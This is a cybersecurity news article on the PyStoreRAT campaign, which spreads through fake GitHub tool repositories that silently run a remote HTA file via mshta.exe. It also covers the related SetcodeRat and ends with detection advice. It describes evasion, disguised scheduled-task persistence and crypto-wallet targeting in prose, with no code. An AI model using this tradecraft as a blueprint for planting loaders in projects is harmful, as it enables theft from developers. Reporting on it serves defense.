Cybersecurity researchers have uncovered a sophisticated malware campaign exploiting GitHub-hosted Python repositories to deliver a previously undocumented JavaScript-based Remote Access Trojan (RAT) known as PyStoreRAT. This discovery highlights the growing trend of attackers abusing trusted developer platforms to distribute malicious payloads.
What Is PyStoreRAT?
PyStoreRAT is described as a modular, multi-stage implant capable of executing multiple payload formats, including:
- EXE and DLL files
- PowerShell scripts
- MSI installers
- Python and JavaScript modules
- HTA payloads
In addition to its core capabilities, PyStoreRAT can deploy Rhadamanthys, a well-known information stealer, as a secondary payload.
How the Attack Works
The campaign leverages fake GitHub repositories disguised as OSINT tools, GPT wrappers, DeFi bots, and security utilities. These repositories often contain only a few lines of code designed to silently download a remote HTA file and execute it via mshta.exe, a legitimate Windows binary frequently abused by attackers.
Once executed, the HTA payload installs PyStoreRAT, which then:
- Profiles the infected system
- Checks for administrator privileges
- Searches for cryptocurrency wallet files (Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02)
- Scans for security tools like CrowdStrike Falcon and Cybereason to evade detection
If security products are detected, the malware modifies its execution chain to reduce visibility, launching mshta.exe via cmd.exe. Persistence is achieved through a scheduled task disguised as an NVIDIA update.
Command Capabilities
PyStoreRAT supports a wide range of malicious actions, including:
- Downloading and executing EXE payloads (including Rhadamanthys)
- Extracting ZIP archives
- Loading DLLs via rundll32.exe
- Executing JavaScript dynamically in memory
- Installing MSI packages
- Spawning additional HTA processes
- Running PowerShell commands in memory
- Spreading via removable drives using malicious LNK files
- Removing scheduled tasks to erase forensic traces
Social Engineering and GitHub Abuse
The campaign began in mid-June 2025 and has steadily published new repositories since then. Threat actors promote these tools on YouTube and X (Twitter) and artificially inflate GitHub stars and forks—a tactic reminiscent of the Stargazers Ghost Network—to make the projects appear legitimate.
Many of these repositories are non-functional, displaying static menus or placeholder operations. This strategy exploits GitHub’s inherent trust to lure developers and analysts into executing the malicious loader stub.
Attribution and Broader Trends
While attribution remains unclear, researchers note Russian-language artifacts and coding patterns suggesting an Eastern European origin. Morphisec’s Yonatan Edri emphasizes that PyStoreRAT represents a shift toward modular, script-based implants that adapt to security controls and evade traditional EDR solutions.
Related Threat: SetcodeRat
In a separate report, QiAnXin detailed SetcodeRat, a RAT targeting Chinese-speaking regions via malvertising lures since October 2025. The malware verifies system language before proceeding and uses DLL sideloading to deploy its payload, enabling capabilities such as:
Keylogging
- Screenshot capture
- Remote command execution
- System and network data collection
Key Takeaways for Security Teams
- Vet GitHub repositories carefully—especially trending projects with sudden popularity.
- Monitor for suspicious mshta.exe executions, particularly those involving remote URLs.
- Harden against LOLBIN abuse by restricting or disabling HTA execution.
- Watch for scheduled tasks disguised as legitimate updates.
- Track access to cryptocurrency wallet files on endpoints.
Final Thoughts
PyStoreRAT underscores the growing risk of supply-chain attacks via trusted platforms. Developers and security teams must adopt stricter vetting processes for open-source tools and implement behavioral detection for script-based threats.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
